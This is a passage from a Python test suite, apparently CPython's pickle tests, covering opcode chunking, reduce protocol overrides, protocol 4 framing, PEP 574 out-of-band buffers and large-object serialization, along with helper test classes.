self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ, s))
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ_EX, s),
4 <= proto)
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_newobj_list_slots(self):
x = SlotList([1, 2, 3])
x.foo = 42
x.bar = "hello"
s = self.dumps(x, 2)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_reduce_overrides_default_reduce_ex(self):
for proto in protocols:
x = REX_one()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 0)
def test_reduce_ex_called(self):
for proto in protocols:
x = REX_two()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_overrides_reduce(self):
for proto in protocols:
x = REX_three()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, None)
def test_reduce_ex_calls_base(self):
for proto in protocols:
x = REX_four()
self.assertEqual(x._proto, None)
s = self.dumps(x, proto)
self.assertEqual(x._proto, proto)
y = self.loads(s)
self.assertEqual(y._proto, proto)
def test_reduce_calls_base(self):
for proto in protocols:
x = REX_five()
self.assertEqual(x._reduce_called, 0)
s = self.dumps(x, proto)
self.assertEqual(x._reduce_called, 1)
y = self.loads(s)
self.assertEqual(y._reduce_called, 1)
@no_tracing
def test_bad_getattr(self):
# Issue #3514: crash when there is an infinite loop in __getattr__
x = BadGetattr()
for proto in protocols:
self.assertRaises(RuntimeError, self.dumps, x, proto)
def test_reduce_bad_iterator(self):
# Issue4176: crash when 4th and 5th items of __reduce__()
# are not iterators
class C(object):
def __reduce__(self):
# 4th item is not an iterator
return list, (), None, [], None
class D(object):
def __reduce__(self):
# 5th item is not an iterator
return dict, (), None, None, []
# Python implementation is less strict and also accepts iterables.
for proto in protocols:
try:
self.dumps(C(), proto)
except pickle.PicklingError:
pass
try:
self.dumps(D(), proto)
except pickle.PicklingError:
pass
def test_many_puts_and_gets(self):
# Test that internal data structures correctly deal with lots of
# puts/gets.
keys = ("aaa" + str(i) for i in range(100))
large_dict = dict((k, [4, 5, 6]) for k in keys)
obj = [dict(large_dict), dict(large_dict), dict(large_dict)]
for proto in protocols:
with self.subTest(proto=proto):
dumped = self.dumps(obj, proto)
loaded = self.loads(dumped)
self.assert_is_copy(obj, loaded)
def test_attribute_name_interning(self):
# Test that attribute names of pickled objects are interned when
# unpickling.
for proto in protocols:
x = C()
x.foo = 42
x.bar = "hello"
s = self.dumps(x, proto)
y = self.loads(s)
x_keys = sorted(x.__dict__)
y_keys = sorted(y.__dict__)
for x_key, y_key in zip(x_keys, y_keys):
self.assertIs(x_key, y_key)
def test_pickle_to_2x(self):
# Pickle non-trivial data with protocol 2, expecting that it yields
# the same result as Python 2.x did.
# NOTE: this test is a bit too strong since we can produce different
# bytecode that 2.x will still understand.
dumped = self.dumps(range(5), 2)
self.assertEqual(dumped, DATA_XRANGE)
dumped = self.dumps(set([3]), 2)
self.assertEqual(dumped, DATA_SET2)
def test_large_pickles(self):
# Test the correctness of internal buffering routines when handling
# large data.
for proto in protocols:
data = (1, min, b'xy' * (30 * 1024), len)
dumped = self.dumps(data, proto)
loaded = self.loads(dumped)
self.assertEqual(len(loaded), len(data))
self.assertEqual(loaded, data)
def test_int_pickling_efficiency(self):
# Test compacity of int representation (see issue #12744)
for proto in protocols:
with self.subTest(proto=proto):
pickles = [self.dumps(2**n, proto) for n in range(70)]
sizes = list(map(len, pickles))
# the size function is monotonic
self.assertEqual(sorted(sizes), sizes)
if proto >= 2:
for p in pickles:
self.assertFalse(opcode_in_pickle(pickle.LONG, p))
def _check_pickling_with_opcode(self, obj, opcode, proto):
pickled = self.dumps(obj, proto)
self.assertTrue(opcode_in_pickle(opcode, pickled))
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
def test_appends_on_non_lists(self):
# Issue #17720
obj = REX_six([1, 2, 3])
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.APPEND, proto)
else:
self._check_pickling_with_opcode(obj, pickle.APPENDS, proto)
def test_setitems_on_non_dicts(self):
obj = REX_seven({1: -1, 2: -2, 3: -3})
for proto in protocols:
if proto == 0:
self._check_pickling_with_opcode(obj, pickle.SETITEM, proto)
else:
self._check_pickling_with_opcode(obj, pickle.SETITEMS, proto)
# Exercise framing (proto >= 4) for significant workloads
FRAME_SIZE_MIN = 4
FRAME_SIZE_TARGET = 64 * 1024
def check_frame_opcodes(self, pickled):
"""
Check the arguments of FRAME opcodes in a protocol 4+ pickle.
Note that binary objects that are larger than FRAME_SIZE_TARGET are not
framed by default and are therefore considered a frame by themselves in
the following consistency check.
"""
frame_end = frameless_start = None
frameless_opcodes = {'BINBYTES', 'BINUNICODE', 'BINBYTES8',
'BINUNICODE8', 'BYTEARRAY8'}
for op, arg, pos in pickletools.genops(pickled):
if frame_end is not None:
self.assertLessEqual(pos, frame_end)
if pos == frame_end:
frame_end = None
if frame_end is not None: # framed
self.assertNotEqual(op.name, 'FRAME')
if op.name in frameless_opcodes:
# Only short bytes and str objects should be written
# in a frame
self.assertLessEqual(len(arg), self.FRAME_SIZE_TARGET)
else: # not framed
if (op.name == 'FRAME' or
(op.name in frameless_opcodes and
len(arg) > self.FRAME_SIZE_TARGET)):
# Frame or large bytes or str object
if frameless_start is not None:
# Only short data should be written outside of a frame
self.assertLess(pos - frameless_start,
self.FRAME_SIZE_MIN)
frameless_start = None
elif frameless_start is None and op.name != 'PROTO':
frameless_start = pos
if op.name == 'FRAME':
self.assertGreaterEqual(arg, self.FRAME_SIZE_MIN)
frame_end = pos + 9 + arg
pos = len(pickled)
if frame_end is not None:
self.assertEqual(frame_end, pos)
elif frameless_start is not None:
self.assertLess(pos - frameless_start, self.FRAME_SIZE_MIN)
@support.skip_if_pgo_task
def test_framing_many_objects(self):
obj = list(range(10**5))
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
pickled = self.dumps(obj, proto)
unpickled = self.loads(pickled)
self.assertEqual(obj, unpickled)
bytes_per_frame = (len(pickled) /
count_opcode(pickle.FRAME, pickled))
self.assertGreater(bytes_per_frame,
self.FRAME_SIZE_TARGET / 2)
self.assertLessEqual(bytes_per_frame,
self.FRAME_SIZE_TARGET * 1)
self.check_frame_opcodes(pickled)
def test_framing_large_objects(self):
N = 1024 * 1024
small_items = [[i] for i in range(10)]
obj = [b'x' * N, *small_items, b'y' * N, 'z' * N]
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
for fast in [False, True]:
with self.subTest(proto=proto, fast=fast):
if not fast:
# fast=False by default.
# This covers in-memory pickling with pickle.dumps().
pickled = self.dumps(obj, proto)
else:
# Pickler is required when fast=True.
if not hasattr(self, 'pickler'):
continue
buf = io.BytesIO()
pickler = self.pickler(buf, protocol=proto)
pickler.fast = fast
pickler.dump(obj)
pickled = buf.getvalue()
unpickled = self.loads(pickled)
# More informative error message in case of failure.
self.assertEqual([len(x) for x in obj],
[len(x) for x in unpickled])
# Perform full equality check if the lengths match.
self.assertEqual(obj, unpickled)
n_frames = count_opcode(pickle.FRAME, pickled)
# A single frame for small objects between
# first two large objects.
self.assertEqual(n_frames, 1)
self.check_frame_opcodes(pickled)
def test_optional_frames(self):
if pickle.HIGHEST_PROTOCOL < 4:
return
def remove_frames(pickled, keep_frame=None):
"""Remove frame opcodes from the given pickle."""
frame_starts = []
# 1 byte for the opcode and 8 for the argument
frame_opcode_size = 9
for opcode, _, pos in pickletools.genops(pickled):
if opcode.name == 'FRAME':
frame_starts.append(pos)
newpickle = bytearray()
last_frame_end = 0
for i, pos in enumerate(frame_starts):
if keep_frame and keep_frame(i):
continue
newpickle += pickled[last_frame_end:pos]
last_frame_end = pos + frame_opcode_size
newpickle += pickled[last_frame_end:]
return newpickle
frame_size = self.FRAME_SIZE_TARGET
num_frames = 20
# Large byte objects (dict values) intermittent with small objects
# (dict keys)
for bytes_type in (bytes, bytearray):
obj = {i: bytes_type([i]) * frame_size for i in range(num_frames)}
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
pickled = self.dumps(obj, proto)
frameless_pickle = remove_frames(pickled)
self.assertEqual(count_opcode(pickle.FRAME, frameless_pickle), 0)
self.assertEqual(obj, self.loads(frameless_pickle))
some_frames_pickle = remove_frames(pickled, lambda i: i % 2)
self.assertLess(count_opcode(pickle.FRAME, some_frames_pickle),
count_opcode(pickle.FRAME, pickled))
self.assertEqual(obj, self.loads(some_frames_pickle))
@support.skip_if_pgo_task
def test_framed_write_sizes_with_delayed_writer(self):
class ChunkAccumulator:
"""Accumulate pickler output in a list of raw chunks."""
def __init__(self):
self.chunks = []
def write(self, chunk):
self.chunks.append(chunk)
def concatenate_chunks(self):
return b"".join(self.chunks)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
objects = [(str(i).encode('ascii'), i % 42, {'i': str(i)})
for i in range(int(1e4))]
# Add a large unique ASCII string
objects.append('0123456789abcdef' *
(self.FRAME_SIZE_TARGET // 16 + 1))
# Protocol 4 packs groups of small objects into frames and issues
# calls to write only once or twice per frame:
# The C pickler issues one call to write per-frame (header and
# contents) while Python pickler issues two calls to write: one for
# the frame header and one for the frame binary contents.
writer = ChunkAccumulator()
self.pickler(writer, proto).dump(objects)
# Actually read the binary content of the chunks after the end
# of the call to dump: any memoryview passed to write should not
# be released otherwise this delayed access would not be possible.
pickled = writer.concatenate_chunks()
reconstructed = self.loads(pickled)
self.assertEqual(reconstructed, objects)
self.assertGreater(len(writer.chunks), 1)
# memoryviews should own the memory.
del objects
support.gc_collect()
self.assertEqual(writer.concatenate_chunks(), pickled)
n_frames = (len(pickled) - 1) // self.FRAME_SIZE_TARGET + 1
# There should be at least one call to write per frame
self.assertGreaterEqual(len(writer.chunks), n_frames)
# but not too many either: there can be one for the proto,
# one per-frame header, one per frame for the actual contents,
# and two for the header.
self.assertLessEqual(len(writer.chunks), 2 * n_frames + 3)
chunk_sizes = [len(c) for c in writer.chunks]
large_sizes = [s for s in chunk_sizes
if s >= self.FRAME_SIZE_TARGET]
medium_sizes = [s for s in chunk_sizes
if 9 < s < self.FRAME_SIZE_TARGET]
small_sizes = [s for s in chunk_sizes if s <= 9]
# Large chunks should not be too large:
for chunk_size in large_sizes:
self.assertLess(chunk_size, 2 * self.FRAME_SIZE_TARGET,
chunk_sizes)
# There shouldn't bee too many small chunks: the protocol header,
# the frame headers and the large string headers are written
# in small chunks.
self.assertLessEqual(len(small_sizes),
len(large_sizes) + len(medium_sizes) + 3,
chunk_sizes)
def test_nested_names(self):
global Nested
class Nested:
class A:
class B:
class C:
pass
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for obj in [Nested.A, Nested.A.B, Nested.A.B.C]:
with self.subTest(proto=proto, obj=obj):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIs(obj, unpickled)
def test_recursive_nested_names(self):
global Recursive
class Recursive:
pass
Recursive.mod = sys.modules[Recursive.__module__]
Recursive.__qualname__ = 'Recursive.mod.Recursive'
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
unpickled = self.loads(self.dumps(Recursive, proto))
self.assertIs(unpickled, Recursive)
del Recursive.mod # break reference loop
def test_py_methods(self):
global PyMethodsTest
class PyMethodsTest:
@staticmethod
def cheese():
return "cheese"
@classmethod
def wine(cls):
assert cls is PyMethodsTest
return "wine"
def biscuits(self):
assert isinstance(self, PyMethodsTest)
return "biscuits"
class Nested:
"Nested class"
@staticmethod
def ketchup():
return "ketchup"
@classmethod
def maple(cls):
assert cls is PyMethodsTest.Nested
return "maple"
def pie(self):
assert isinstance(self, PyMethodsTest.Nested)
return "pie"
py_methods = (
PyMethodsTest.cheese,
PyMethodsTest.wine,
PyMethodsTest().biscuits,
PyMethodsTest.Nested.ketchup,
PyMethodsTest.Nested.maple,
PyMethodsTest.Nested().pie
)
py_unbound_methods = (
(PyMethodsTest.biscuits, PyMethodsTest),
(PyMethodsTest.Nested.pie, PyMethodsTest.Nested)
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method in py_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(), unpickled())
for method, cls in py_unbound_methods:
obj = cls()
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(obj), unpickled(obj))
def test_c_methods(self):
global Subclass
class Subclass(tuple):
class Nested(str):
pass
c_methods = (
# bound built-in method
("abcd".index, ("c",)),
# unbound built-in method
(str.index, ("abcd", "c")),
# bound "slot" method
([1, 2, 3].__len__, ()),
# unbound "slot" method
(list.__len__, ([1, 2, 3],)),
# bound "coexist" method
({1, 2}.__contains__, (2,)),
# unbound "coexist" method
(set.__contains__, ({1, 2}, 2)),
# built-in class method
(dict.fromkeys, (("a", 1), ("b", 2))),
# built-in static method
(bytearray.maketrans, (b"abc", b"xyz")),
# subclass methods
(Subclass([1,2,2]).count, (2,)),
(Subclass.count, (Subclass([1,2,2]), 2)),
(Subclass.Nested("sweet").count, ("e",)),
(Subclass.Nested.count, (Subclass.Nested("sweet"), "e")),
)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for method, args in c_methods:
with self.subTest(proto=proto, method=method):
unpickled = self.loads(self.dumps(method, proto))
self.assertEqual(method(*args), unpickled(*args))
def test_compat_pickle(self):
tests = [
(range(1, 7), '__builtin__', 'xrange'),
(map(int, '123'), 'itertools', 'imap'),
(functools.reduce, '__builtin__', 'reduce'),
(dbm.whichdb, 'whichdb', 'whichdb'),
(Exception(), 'exceptions', 'Exception'),
(collections.UserDict(), 'UserDict', 'IterableUserDict'),
(collections.UserList(), 'UserList', 'UserList'),
(collections.defaultdict(), 'collections', 'defaultdict'),
]
for val, mod, name in tests:
for proto in range(3):
with self.subTest(type=type(val), proto=proto):
pickled = self.dumps(val, proto)
self.assertIn(('c%s\n%s' % (mod, name)).encode(), pickled)
self.assertIs(type(self.loads(pickled)), type(val))
def test_local_lookup_error(self):
# Test that whichmodule() errors out cleanly when looking up
# an assumed globally-reachable object fails.
def f():
pass
# Since the function is local, lookup will fail
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Same without a __module__ attribute (exercises a different path
# in _pickle.c).
del f.__module__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
# Yet a different path.
f.__name__ = f.__qualname__
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises((AttributeError, pickle.PicklingError)):
pickletools.dis(self.dumps(f, proto))
#
# PEP 574 tests below
#
def buffer_like_objects(self):
# Yield buffer-like objects with the bytestring "abcdef" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
# Return a true value from buffer_callback should have
# the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
# Non iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
# All protocols use 1-byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
class REX_state(object):
"""This class is used to check the 3th argument (state) of
the reduce protocol.
"""
def __init__(self, state=None):
self.state = state
def __eq__(self, other):
return type(self) is type(other) and self.state == other.state
def __setstate__(self, state):
self.state = state
def __reduce__(self):
return type(self), (), self.state
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class MyIntWithNew(int):
def __new__(cls, value):
raise AssertionError
class MyIntWithNew2(MyIntWithNew):
__new__ = int.__new__
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
